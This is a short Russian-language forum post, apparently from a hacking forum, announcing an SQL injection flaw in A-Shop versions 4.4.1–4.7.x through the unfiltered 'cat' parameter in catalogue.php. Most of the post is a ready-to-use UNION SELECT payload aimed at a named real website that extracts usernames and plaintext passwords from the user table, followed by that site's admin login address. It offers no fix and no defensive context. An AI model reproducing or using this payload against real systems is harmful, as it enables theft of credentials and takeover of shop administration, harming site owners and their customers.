19.11.2007, 19:03
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
A-Shop Версии: 4.4.1(возможно и более ранние) - 4.7.х(last)
SQL-инъекция с доступом в user и с незашифренными пасами.
Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2.
Пример:
Код:
http://www.the123d.com/shop/catalogue.php?cat=-21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+user/*
Админка:
http://www.the123d.com/shop/admin/login.php
Отправил на video@antichat.ru должны скоро выложить. |
|
|